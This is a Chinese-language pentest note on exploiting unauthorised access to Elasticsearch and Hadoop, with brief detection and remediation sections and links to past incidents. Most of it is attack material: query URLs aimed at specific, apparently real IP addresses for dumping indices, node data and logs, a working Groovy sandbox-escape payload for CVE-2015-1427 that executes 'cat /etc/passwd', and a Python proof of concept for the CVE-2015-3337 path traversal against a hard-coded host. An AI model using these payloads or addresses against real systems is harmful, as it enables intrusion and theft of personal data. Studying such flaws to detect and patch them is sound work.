基本说明

VulBOX
https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html

延伸阅读

https://www.ichunqiu.com/course/1413

Redis未授权访问
其他 NoSQL未授权访问
MongoDB、Redis、ES、Memcached、Hadoop

漏洞描述

ElasticSearch 是一款Java编写的企业级搜索服务，启动此服务默认会开放9200端口，可被非法操作数据。

漏洞检测

默认端口 9200 HTTP协议
返回内容中包含”You Know, for Search”

(另外，AWVS也可发现)

一般来说，出现这种问题的多数是默认配置的ElasticSearch
(粗检只考虑9200，如果是作为甲方那还是要所有端口过一遍)
所以只要检测9200就好了，如果端口不在9200，通常说明运维、开发者可能已经在考虑一些安全性问题，也就没必要深究了。

一些利用的URL

节点URL

http://101.198.161.130:9200/_cat/indices/
http://101.198.161.130:9200/_plugin/head/
http://101.198.161.130:9200/_nodes
http://101.198.161.130:9200/_nodes?prettify
http://101.198.161.130:9200/_status
http://101.198.161.130:9200/_search?pretty
http://10.203.9.131:9200/zjftu/
http://10.203.9.131:9200/zjftu/_search?pretty

Hadoop未授权访问

1 2	http://103.15.200.81:50070/dfshealth.jsp http://103.15.200.81:50070/logs/

漏洞危害

可被非法操作数据，对网站数据造成影响。

修复方案

1.关闭9200端口
2.防火墙上设置禁止外网访问此端口。

历史事件漏洞

安全脉搏搜索
乌云镜像搜索
CNVD搜索

1 360手机一处Elasticsearch未授权访问 (2016-04-19)
https://www.secpulse.com/archives/46394.html

2 暴风某站Elasticsearch未授权访问&Hadoop未授权访问(2016-04-27)
https://www.secpulse.com/archives/49115.html

3 新华网某频道服务器一处Elasticsearch配置不当/可任意操作/涉及被采访人员信息(2016-03-19)
https://www.secpulse.com/archives/46976.html

(ElasticSearch RCE)
4 神器而已证券系列之九州证券某站Elasticsearch远程代码执行漏洞(2015-09-11 18:30)
(内含少量内网套路)
https://www.secpulse.com/archives/39822.html

5 风行某站Elasticsearch配置不当（任意文件读取）
https://www.secpulse.com/archives/41126.html

6 上海某服务器一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(790多W用户姓名\身份证号\民族\开房时间\退房时间\房间号等)(2016-03-16)
https://www.secpulse.com/archives/46801.html

7 广西移动一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(用户手机号码/IMEI/IMSI/上网时间/地点等)
https://www.secpulse.com/archives/46798.html

ElasticSearch Groovy RCE (CVE-2015-1427)

影响范围
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.

对一下链接进行一个POST

http://127.0.0.1:9200/_search?pretty

POST的data域如下

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

几个其他Exp

https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.csdn.net/u011066706/article/details/51175761

es_poc_1.py

#!/usr/bin/env python  
#-*- coding:utf-8 -*-  
import requests  
host= "10.203.9.131"
port = 9200
def elastic_directoryTraversal(host,port):  
    pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']  
    pList = ['/../../../../../../../../../../../../../../etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd','/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini']  
    for p in pluginList:  
        for path in pList:  
            urlA = "http://%s:%d/_plugin/%s%s" % (host,port,p,path)  
            try:  
                content = requests.get(urlA,timeout=5,allow_redirects=True,verify=False).content
                print content
                print "\n-------------------------------------------------------------\n"
                if "/root:/" in content:  
                    print 'Elasticsearch 任意文件读取漏洞(CVE-2015-3337) Found!'  
            except Exception,e:  
                print e
elastic_directoryTraversal(host,port)

Neurohazard

ElasticSearch未授权访问的检测与利用思路